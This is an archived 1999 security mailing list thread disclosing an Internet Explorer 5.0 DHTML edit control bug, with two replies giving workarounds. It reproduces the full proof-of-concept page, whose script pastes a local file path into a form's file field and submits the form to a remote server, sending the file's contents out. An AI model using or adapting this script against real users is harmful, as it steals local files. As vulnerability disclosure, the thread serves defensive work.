msie.5.0.local.files.txt

`Date: Tue, 30 Mar 1999 19:35:16 +0300  
From: Georgi Guninski <[email protected]>  
To: [email protected]  
Subject: IE 5.0 allows reading and sending local files to a remote server  
  
There is a security bug in Internet Explorer 5.0, which allows reading  
and  
sending local files to a remote server.  
The problem is a bug in the DHTML edit control, which allows pasting a  
filename in a FILE object. When the form is submitted via JavaScript,  
the  
contents of the file are sent to a remote server.  
  
Demonstration is available at: http://www.nat.bg/~joro/fr.html  
  
Workaround: Disable JavaScript  
  
I would like to thank Juan Cuartango  
(http://pages.whowhere.com/computers/cuartangojc/index.html) for his IE  
exploits,  
which helped me a lot for discovering this vulnerability!  
  
Regards,  
Georgi Guninski  
http://www.nat.bg/~joro  
  
-------------------------------------------------------------------------  
  
[http://www.nat.bg/~joro/fr.html]  
  
<HTML><HEAD><TITLE>IE 5.0 file reading</TITLE>  
</HEAD>  
<BODY>  
There is a bug in Internet Explorer 5.0 which allows reading and sending local files.  
<BR>  
The file name must be known.  
<BR>  
Thanks to Juan Cuartango for his exploits, which helped me a lot for discovering this vulnerability!  
<BR>  
Written by <A HREF="http://www.nat.bg/~joro">Georgi Guninski</A>  
<BR>  
Workaround: Disable JavaScript  
<BR>  
<BR>  
<INPUT TYPE=TEXT ID=A1 VALUE="C:\TEST.TXT">  
  
<SCRIPT>  
  
function f1()  
{  
  
  
document.all.A1.select();  
document.execCommand("copy");  
  
dh.DOM.forms(0).elements(0).focus();  
dh.execCommand(5032);  
setTimeout("dh.DOM.forms(0).submit();",1000);  
  
  
  
}  
  
function f()  
{  
alert("Create a file C:\\test.txt and it will be read and shown in another window \n You may need to wait some time");  
dh.loadURL("http://www.nat.bg/~joro/form3.html");  
setTimeout("f1()",2000);  
}  
  
setTimeout("f();",1000);  
  
</SCRIPT>  
  
  
  
  
<OBJECT classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A height=100 id=dh   
width=700>  
</OBJECT>  
  
  
</BODY>  
</HTML>  
  
-------------------------------------------------------------------------  
  
Date: Wed, 31 Mar 1999 09:14:47 +0100  
From: Andrew Tulloch <[email protected]>  
To: [email protected]  
Subject: Re: IE 5.0 allows reading and sending local files to a remote server  
  
  
If you look under scripting options in security settings there is the option  
"Allow paste via script" simply turning this to disabled provides this  
result:  
  
<paste>  
See the contents of your file among the other stuff  
----------------------------------------------------------------------------  
----  
-----------------------------7cf26c3b6a8 Content-Disposition: form-data;  
name = "a"; filename="" Content-Type:  
application/octet-stream -----------------------------7cf26c3b6a8--  
</paste>  
  
which as far as I see has disabled the reading of local files and is a  
little less drastic than disabling all JavaScript.  
  
Regards,  
  
Andrew Tulloch  
  
-------------------------------------------------------------------------  
  
Date: Wed, 31 Mar 1999 14:05:21 -0800  
From: "Stephen Purpura (MSFDC-JV)" <[email protected]>  
To: [email protected]  
Subject: Re: IE 5.0 allows reading and sending local files to a remote server  
  
There is another workaround. In IE5, if you use the "built in" feature to  
limit scripted paste operations then the problem doesn't seem to manifest.  
  
Try the following and goto the sample implementation:  
  
Tools menu --> Internet options --> security tab --> custom level --> allow  
paste operations via script = prompt or disable  
  
  
Stephen  
  
`